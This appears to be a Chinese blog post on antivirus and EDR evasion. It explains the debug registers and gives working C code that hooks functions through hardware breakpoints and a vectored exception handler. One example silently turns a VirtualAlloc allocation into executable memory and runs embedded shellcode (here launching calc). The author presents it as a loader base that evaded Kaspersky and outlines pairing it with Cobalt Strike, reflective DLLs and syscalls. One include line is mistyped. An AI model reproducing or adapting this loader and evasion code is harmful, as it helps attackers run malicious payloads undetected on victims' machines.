免杀笔记 ---> 无痕Hook?硬件断点 Syscall!
说到Hook,我们有很多Hook,像Inline-Hook,我们也是用的比较多,但是正如我上一篇Blog说的,他会对内存进行修改,如果EDR或者AV增加一个校验机制,不断检验某一块内存,那么就算你用syscall绕过了Ring3的Hook成功修改了内存也是会被扫描出来的!
于是就有了今天的无痕Hook ---> 硬件断点
其实也是小编收到了粉丝的建议,于是赶出来了那个代码,但是这个技术是未公开的,所以小编就不放代码,但是会公布部分,以及一些细节(我也不想这个技术那么快没用,望理解😋)
但是效果还是可以展示的(卡巴斯基30minutes未杀,但是也不建议用CS对抗)
目录
1.调试寄存器
1.DR0 - DR3
2.DR7
3.DR6
2.无痕Hook
3.免杀!
1.调试寄存器
如上图,就是Windows的调试寄存器,它位于CPU中,我们讲一些比较重要的寄存器
1.DR0 - DR3
首先就是这三个寄存器了,这也是我们能使用的4个断点寄存器,它用来存储断点的地址
2.DR7
这个就是一个比较重要的寄存器了,我们从右往左去看
首先就是前八位,包含了L0 - L3 以及 G0 - G3,其中L是局部开关,G是全局开关,分别对应DR0 - DR3
然后就是R/W 和 LEN ,分别对应着读写域和 长度域
其中读写域(R/W)有四种状态 :
00 (硬件执行断点)
01 (硬件写入断点)
10 (IO中断)
11 (硬件访问断点)
其中长度域的状态
00 ---- 1字节
01 ----- 2字节
10 ----- 8字节
11 ----- 4字节
3.DR6
此寄存器可以用于描述硬件断点的情况,当我们在DR0下断点的时候,对应的B0就会变成1,DR1-3也是如此,那么如果B0-3都不为1的话,那么说明就是TF位为0的单步异常
2.无痕Hook
我们这里还是拿MessageBoxA来举例(好像每次受伤的都是它hhhh)
#include<Windows.h>
#include<stdio.j>
SIZE_T MessageBoxAddr = NULL;
LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)
{
if ((SIZE_T)pExcepInfo->ExceptionRecord->ExceptionAddress == MessageBoxAddr)
{
const char* title = "硬件断点Hook";
const char* context = "已经被Hook";
pExcepInfo->ContextRecord->R8 = (unsigned long long)title;
pExcepInfo->ContextRecord->Rdx = (unsigned long long)context;
// 清除硬件断点
pExcepInfo->ContextRecord->Dr0 = 0;
pExcepInfo->ContextRecord->Dr7 = 0x0;
return EXCEPTION_CONTINUE_EXECUTION;
}
return EXCEPTION_CONTINUE_SEARCH;
}
void HardWareBreakPoint(HANDLE hThread)
{
CONTEXT ctx;
ctx.ContextFlags = CONTEXT_ALL;
GetThreadContext(hThread, &ctx);
ctx.Dr0 = MessageBoxAddr;
ctx.Dr7 = 0x00000001;
SetThreadContext(hThread, &ctx);
}
int main()
{
MessageBoxAddr = (SIZE_T)GetProcAddress(GetModuleHandleA("user32.dll"), "MessageBoxA");
AddVectoredExceptionHandler(1, &FirstVectExcepHandler);
//没有hook
MessageBoxA(NULL, "没有Hook", "不存在Hook",MB_OK);
// 硬件断点Hook
HardWareBreakPoint(GetCurrentThread());
MessageBoxA(NULL, "没有Hook", "不存在Hook", MB_OK);
//已去除硬件断点的Hook
MessageBoxA(NULL, "没有Hook", "不存在Hook", MB_OK);
}其实思路就是如下
- 先注册一个异常,用于断点处的操作(操作堆栈或者寄存器)
- 然后写一个硬件断点,调试寄存器是你要断的地址
- 然后当你的程序调用这个函数,或者说call这个地址的时候就会触发硬件断点(具体什么断点看你怎么设置,这里是硬件执行断点)
- 然后就进入你的Veh函数进行处理
并且我们可以看见被Hook的时候,它的内存是没有任何的改变的,这一点就能很好的对抗CRC32检测内存Patch的规则!!
这里我们也可以用一个计算器的脚本来进行加深理解(此脚本完全可以改成Loader,自行研究)
#include<stdio.h>
#include<Windows.h>
//硬件断点Hook VirtualAlloc
SIZE_T virtualAllocAddr = NULL;
LPVOID testAddr = NULL;
LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)
{
if ((SIZE_T)pExcepInfo->ExceptionRecord->ExceptionAddress == virtualAllocAddr)
{
//设置为可读可写可执行
pExcepInfo->ContextRecord->R9 = PAGE_EXECUTE_READWRITE;
// 清除硬件断点
pExcepInfo->ContextRecord->Dr0 = 0;
pExcepInfo->ContextRecord->Dr7 = 0x0;
return EXCEPTION_CONTINUE_EXECUTION;
}
return EXCEPTION_CONTINUE_SEARCH;
}
void HardWareBreakPoint(HANDLE hThread)
{
CONTEXT ctx;
ctx.ContextFlags = CONTEXT_ALL;
GetThreadContext(hThread, &ctx);
ctx.Dr0 = virtualAllocAddr;
ctx.Dr7 = 0x00000001;
SetThreadContext(hThread, &ctx);
}
unsigned char Payload[] = {
0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51,
0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52,
0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72,
0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,
0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41,
0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B,
0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,
0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41,
0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,
0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1,
0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,
0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44,
0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01,
0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,
0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48,
0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D,
0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5,
0xBB, 0xE0, 0x1D, 0x2A, 0x0A, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,
0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0,
0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89,
0xDA, 0xFF, 0xD5, 0x63, 0x61, 0x6C, 0x63, 0x00
};
void DummyFunction()
{
HardWareBreakPoint(GetCurrentThread());
testAddr = VirtualAlloc(NULL, sizeof(Payload), MEM_COMMIT, PAGE_READWRITE);
memcpy(testAddr, Payload, sizeof(Payload));
printf("%p", testAddr);
((void(*)())testAddr)();
}
int main()
{
HANDLE hThread = NULL;
//硬件断点无痕Hook VirtualAlloc
virtualAllocAddr = (SIZE_T)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "VirtualAlloc");
AddVectoredExceptionHandler(1, &FirstVectExcepHandler);
hThread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)DummyFunction, NULL, NULL, NULL);
WaitForSingleObject(hThread, INFINITE);
return 0;
}可以看见我们一开始分配的rw内存也是在硬件断点Hook的情况下变成了RWX
并且计算器也是能成功弹出来的
并且我们的VirtualAlloc也是没有被Hook的(这里的Jmp并不是我们的操作,其他程序也会如此)
我们的程序
系统自己的程序
3.免杀!
等了这么久,终于来到重头戏了,这里我不会详细讲,只是提个大体思路(聪明的你们应该能自己实现的吧😋😋)
其实还是WBG大佬的脚本,不过是多次的升华,我们还是盯着VirtualAlloc 和Sleep这两函数
然后就是重点的Veh函数处理(这里的VirtualAlloc必须在获取反射dll和loader的产物那块地址之后进行 "脱钩" ,否则你后面BOF的执行会有问题,不用Bof当我没说。。。)
重点就是这两个啦,正所谓 "救赎之道,就在其中" 也正是我们的无痕断点,使得我们并不需要对内存进行Patch ,配合Syscall ,大家可以放心食用😊😋😋
此JMP并不是我的操作(并无对内存进行Patch)
